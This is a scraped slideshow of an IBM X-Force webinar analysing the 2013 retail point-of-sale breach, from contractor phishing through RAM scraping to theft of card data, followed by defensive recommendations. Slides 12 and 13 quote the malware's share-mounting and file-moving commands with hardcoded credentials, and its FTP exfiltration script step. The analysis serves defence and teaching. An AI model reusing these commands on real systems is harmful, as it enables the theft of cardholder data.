Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Anatomy of an Advanced Retail Breach


Published on

The personal and financial information of approximately 110 million Americans, comprising 11 GB of data, was stolen in a successful compromise of a retail giant during the 2013 Christmas shopping season. Equally concerning is that the attackers persisted – undetected – for as long as two weeks before the breach was discovered. What can retailers and other enterprises learn from this event? Join IBM Security experts on Wednesday, February 19th where we will share details on the anatomy of this breach and recommended steps to protect you against similar attacks.

View the full on-demand webcast:

Published in: Technology

Anatomy of an Advanced Retail Breach

  1. 1. IBM Security Systems Anatomy of an Advanced Retail Breach Chris Poulin Research Strategist, X-Force February 2014 © 2014 IBM Corporation 1 © 2012 IBM Corporation
  2. 2. IBM Security Systems Agenda  About the IBM X-Force  Dissection of a retail attack and data breach  Solutions to prevent similar compromises Note: Information provided by IBM in this webinar and the associated blog entry is derived from research by the author and/or the IBM X-Force, and is based on publicly available sources. No information was obtained by, or otherwise derived from, any confidential information shared with IBM. 2 © 2014 IBM Corporation
  3. 3. IBM Security Systems X-Force is the foundation for advanced security and threat research across the IBM Security Framework The mission of X-Force is to:  Monitor and evaluate the rapidly changing threat landscape  Research new attack techniques and develop protection for tomorrow’s security challenges  Educate our customers and the general public 3 © 2014 IBM Corporation
  4. 4. IBM Security Systems Collaborative IBM teams monitor and analyze the changing threat landscape Coverage Depth 20,000+ devices 17B analyzed under contract 3,700+ managed clients worldwide 15B+ events managed per day 133 monitored countries (MSS) 1,000+ security related patents 4 web pages & images 40M spam & phishing attacks 73K documented vulnerabilities Billions of intrusion attempts daily Millions of unique malware samples © 2014 IBM Corporation
  5. 5. IBM Security Systems Anatomy of the Breach Attacker phishes a 3rd party contractor 4 Malware scrapes RAM for clear text CC stripe data Attacker finds & infects POS systems w/malware 1 3b Attacker uses stolen credentials to access contractor portals 2 Retailer POS systems 5 Attacker finds & infects internal Windows file server Malware sends CC data to internal server; sends custom ping to notify 3a Contractor portals Firewall 6 Attacker FTP servers (external/Russia) 5 Retailer Windows file server Stolen data is exfiltrated to FTP servers internal network © 2014 IBM Corporation
  6. 6. IBM Security Systems 1. Phish a 3rd Party Contractor Attacker phishes a 3rd party contractor 1  HVAC firm in PA  Email malware campaign  Citadel password stealing bot, variant of Zeus banking trojan  Primary method of malware detection free version of Malwarebytes Anti-Malware  On-demand scanning; not for commercial use  Supplier portal contains lots of public information – Example: list of resources for HVAC companies 6 © 2014 IBM Corporation
  7. 7. IBM Security Systems 2. Access & exploit contractor portal Attacker uses stolen credentials to access contractor portal 2 NS @ Contractor portal Contractors generally not required to use token or other 2-factor authentication, NS @,, NS @ 7 © 2014 IBM Corporation
  8. 8. IBM Security Systems 3a. Discover & exploit internal file server Attacker finds & infects internal Windows file server 3a  Exact method of movement from portal to internal server unknown  Probably not HVAC partner—cloud-based, not on retailer extranet Retailer Windows file server  Back-end connect from partner portal or other retailer owned asset?  SQL injection, browser exploit, open ingress port, who knows?  Or maybe contractors had access to internal network to monitor HVAC systems remotely 8 © 2014 IBM Corporation
  9. 9. IBM Security Systems 3a. Discover & exploit internal file server (cont’d) Attacker finds & infects internal Windows file server 3a  Intel from contractor portal? Lots of resources; example: Excel spreadsheets with useful metadata – Created by username John.Doe – Printed recently on Windows DOMAIN  Google search easily reveals location of retail datacenters: Retailer Windows file server  Malware to accumulate stolen card data and exfiltrate regularly (may have been 2 separate servers) – Username=―Best1_user‖; password=―BackupU$r‖ – Same username is installed with BMC Software Performance Assurance for Microsoft Server; password is not generated by BMC – Installed as ―BladeLogic‖, hiding as BMC component, BladeLogic Automation Suite; however, BMC doesn’t name any component ―bladelogic.exe‖ – System / Administrator level account; can run batch jobs 9 © 2014 IBM Corporation
  10. 10. IBM Security Systems 3b. Find & infect POS systems With a point of presence on an internal server, it’s all unicorns and rainbows from here. Evil unicorns Attacker finds & infects POS systems w/malware 3b Retailer POS systems Retailer Windows file server Image source: 10 © 2014 IBM Corporation
  11. 11. IBM Security Systems 4. Malware scrapes card data from RAM 4 Malware scrapes RAM for clear text CC stripe data  Trojan.POSRAM, variant of BlackPOS  No anti-virus solution had a signature for the malware at the time of the attack, or at the time of disclosure Retailer POS systems  Looks for ―pos.exe‖ process  Installs trojan, creates registry entries containing string ―POSWDS‖  Scrape RAM for track 1 and track 2 data of financial cards  Card track data is encrypted – Between the reader and POS, and – again between the POS and payment processor  Unencrypted momentarily at the POS as the transaction is cleared  Debit card PINs are hashed at the card reader  Chip-and-PIN encrypts the transaction from the card to processor  Stores stolen card data in file %SystemRoot%system32winxml.dll 11 © 2014 IBM Corporation
  12. 12. IBM Security Systems 5. Harvested card data is sent to internal rally point  Moves stolen card data to a central collection point  Assumes POS systems have no internet access  Creates temp Windows share on domain  Malware on rally point creates share in %windir%twain_32 Retailer POS systems Malware sends CC data to internal server; sends custom ping to notify 5  Encodes base64, with encoding string JN8hdEe3P0cUMTs5kQolDWC9BV26GjRIZnXfOF+K4rYtmqg7b/y1xwvpHiLAzSau  Moves winxml.dll to <RallyPoint>_<Day>_<Mon>_<Hr>.txt  POS malware sends custom ICMP to as semaphore Retailer Windows file server net use S: <HardCodedIP>c$WINDOWStwain_32 /user:Best1_user BackupU$r move %windir%system32winxml.dll S:<InfectedMachineName>_<Day>_<Month>_<Hour>.txt” net use S: /del 12 © 2014 IBM Corporation
  13. 13. IBM Security Systems 6. Card data is exfiltrated to FTP servers in Russia  Compiles all card dumps into c:windowstwain_32a.dll  Exfiltrates data via FTP to <PublicFTPServer>/public_html/cgi-bin  Generates an FTP script and executes ftp –s <path>cmd.txt 6 Attacker FTP servers (external/Russia) 13 Retailer Windows file server Stolen data is exfiltrated to FTP servers © 2014 IBM Corporation
  14. 14. IBM Security Systems Protect endpoints  The ultimate prize: – POS systems: where the card data is processed – File servers: base of operations – Web servers: initial incursion vector – Contractor workstations: intelligence, credentials  Malware protection: – Contractor workstations (phishing, Citadel bot) – POS systems: RAM scraper trojan – File servers: data management and exfiltration tools – Application isolation (Intel SGX; micro-virtualization, etc) to prevent RAM scraping  Patch  Configuration management 14 © 2014 IBM Corporation
  15. 15. IBM Security Systems Protection against web and file server compromises  Secure development lifecycle (SDLC) – Secure coding practices training – Static/source code analysis—manual (code review) and automated – Dynamic code analysis (esp low hanging fruit: SQL injection & XSS) – Include compiled application, web applications, mobile apps  Go-live security process – Harden system (reduce footprint/services, suppress excess information, harden apps, change usernames / passwords) – Install appropriate endpoint protection and configuration management – Vulnerability scan  Appropriate authentication – Separate domains / administrative credentials (identity separation) – Multi-factor authentication 15 © 2014 IBM Corporation
  16. 16. IBM Security Systems Segment critical assets  Enumerate & classify Image source:  Restrict web assets’ access to internal systems  Isolate public / partner facing assets from private assets  Segment operational technology (OT), critical assets, and general IT  Perform firewall rule analysis, paying special attention to: – assets containing sensitive data, such as cardholder information – risky protocols and flow directions  For example, POS systems shouldn’t – mount Windows shares, or – send regular ICMP packets 16 © 2014 IBM Corporation
  17. 17. IBM Security Systems Monitor & detect: network  Network activity pattern monitoring can detect: – Suspicious scanning activity as attacker maps out the network landscape – Policy violations for outbound FTP, especially to Eastern Bloc countries  Network packet inspection can detect: – IPS can stop SQL injection, XSS, other more advanced attacks – Credit card number patterns in outbound data – Suspect strings in ICMP packets – Identify network traffic that is not what it seems: e.g., • Non-DNS protocol over port 53 • IRC over port 80 17 © 2014 IBM Corporation
  18. 18. IBM Security Systems Monitor & detect: vulnerability and anomaly detection  Vulnerability scanning, including deep endpoint assessment – example: registry entries containing ―POSWDS‖  Anomaly detection – Profile behavior of critical assets, e.g., POS and HVAC systems (if remote access) – Detect deviations from baseline: • POS connecting to Windows shares • POS emitting ICMP packets – General anomalous behavior or change in network pattern: ICMP, SMB/CIFS, FTP – Profile ICMP packet sizes, normal payload contents; identify & block deviations 18 © 2014 IBM Corporation
  19. 19. IBM Security Systems Incident Response  Speedy and complete forensics – early in the process if the compromise is detected before data is stolen, or – after a severe breach when accurate impact analysis is critical: • Which systems were compromised? • How many customers were affected? • How much of the data comprised personal information?  Instrument everything feasible, – include POS systems and network activity – Enrich with context from • vulnerability assessment tools • change management transactions • security intelligence feeds. 19 © 2014 IBM Corporation
  20. 20. IBM Security Systems Incident / emergency response  Plan should include – Detection – Response and escalation – Engaging law enforcement as appropriate – Preservation of evidence – Compliance with regulations and contractual agreements – Customer and press notification – Public relations.  Engage your contracted external emergency response agency in advance – Help you prepare for a breach and – Gather context about your environment.  Test your process regularly  Business associate contract and assessment 20 © 2014 IBM Corporation
  21. 21. IBM Security Systems At IBM, the world is our security lab Security Operations Centers Security Research and Development Labs Institute for Advanced Security Branches More than 6,000 21 IBM researchers, developers, and subject matter experts ALL focused on security 3,000 IBM security patents v13-01 © 2014 IBM Corporation
  22. 22. Get Engaged with IBM X-Force Research and Development Follow us at @ibmsecurity and @ibmxforce Download X-Force security trend & risk reports Subscribe to X-Force alerts at or IBM Security blog at 22 IBM Security © 2014 IBM Corporation
  23. 23. IBM Security Systems Statement of Good Security Practices: IT system security involves protecting systems and information through prevention, detection and response to improper access from within and outside your enterprise. Improper access can result in information being altered, destroyed or misappropriated or can result in damage to or misuse of your systems, including to attack others. No IT system or product should be considered completely secure and no single product or security measure can be completely effective in preventing improper access. IBM systems and products are designed to be part of a comprehensive security approach, which will necessarily involve additional operational procedures, and may require other systems, products or services to be most effective. IBM DOES NOT WARRANT THAT SYSTEMS AND PRODUCTS ARE IMMUNE FROM THE MALICIOUS OR ILLEGAL CONDUCT OF ANY PARTY. © Copyright IBM Corporation 2013. All rights reserved. The information contained in these materials is provided for informational purposes only, and is provided AS IS without warranty of any kind, express or implied. IBM shall not be responsible for any damages arising out of the use of, or otherwise related to, these materials. Nothing contained in these materials is intended to, nor shall have the effect of, creating any warranties or representations from IBM or its suppliers or licensors, or altering the terms and conditions of the applicable license agreement governing the use of IBM software. References in these materials to IBM products, programs, or services do not imply that they will be available in all countries in which IBM operates. Product release dates and/or capabilities referenced in these materials may change at any time at IBM’s sole discretion based on market opportunities or other factors, and are not intended to be a commitment to future product or feature availability in any way. IBM, the IBM logo, and other IBM products and services are trademarks of the International Business Machines Corporation, in the United States, other countries or both. Other company, product, or service names may be trademarks or service marks of others. 23 © 2014 IBM Corporation